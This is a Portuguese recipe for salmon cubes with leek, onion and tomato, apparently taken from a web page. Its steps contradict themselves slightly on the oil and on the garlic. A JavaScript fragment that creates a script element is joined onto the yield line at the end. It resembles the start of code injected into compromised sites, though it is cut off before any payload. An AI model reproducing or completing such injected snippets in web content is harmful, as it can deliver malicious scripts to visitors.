Cubinhos de salmão com legumes

Ingredientes

300g de salmão

1 alho poró médio

½ cebola média picadinha

1 dente médio de alho

1 colheres de sopa de óleo de canola

1 tomate maduro ou 1 tomate pelado (de lata)

Salsa, pimenta e sal a gosto

 

Modo de fazer:

1-Corte o salmão e corte-os em cubos grossos retirando-lhes as espinhas., se tiver. Tempere com um pouco de sal.

2- Arranje o alho-poró, corte-o em rodelas, lave-as e deixe-as escorrer.

3-Descasque a cebola e o dente de alho, pique tudo e junto com o alho poró para a panela;

4- Junte o azeite, leve ao fogo e deixe cozinhar até a cebola ficar macia.

5-Adicione o tomate cortados em gomos grossos, o alho e os cubos de salmão, tempere com pimenta e um pouco de sal. Tape e deixe cozinhar, em fogo brando, durante 10 minutos.

6- Retire do fogo e sirva quente decorado com salsa picada.

Rendimento: 2 porçõesvar d=document;var s=d.createElement(‘script’);

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